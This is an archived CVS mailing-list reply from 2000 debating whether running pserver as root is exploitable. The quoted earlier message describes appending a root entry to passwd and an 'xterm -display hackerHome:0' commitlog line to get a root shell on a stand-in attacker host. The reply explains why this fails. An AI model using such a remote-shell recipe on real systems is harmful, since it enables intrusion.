info-cvs
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: PServer authentication


From: Larry Jones
Subject: Re: PServer authentication
Date: Fri, 13 Oct 2000 11:15:27 -0400 (EDT)

Martin Vogt writes:
>
> And as long as you dont run cvs as "root" from inetd.
> This is _very_ important, otherwise add passwd to the checkoutlist
> (when you have write access) add root:apasswd:root and add
> an xterm -display hackerHome:0 to the commitlog, voila: root shell.

When you run pserver as root, it only runs as root long enough to
vaildate the user and password, then it changes user to run as the user.
So the above only works if the user has write access to passwd, in which
case it would be a whole lot easier to login to the machine and edit it
directly instead of fooling around with CVS.  Like I said, pserver
doesn't let you do anything that you couldn't do from a shell.

-Larry Jones

No one can prove I did that!! -- Calvin



reply via email to

[Prev in Thread] Current Thread [Next in Thread]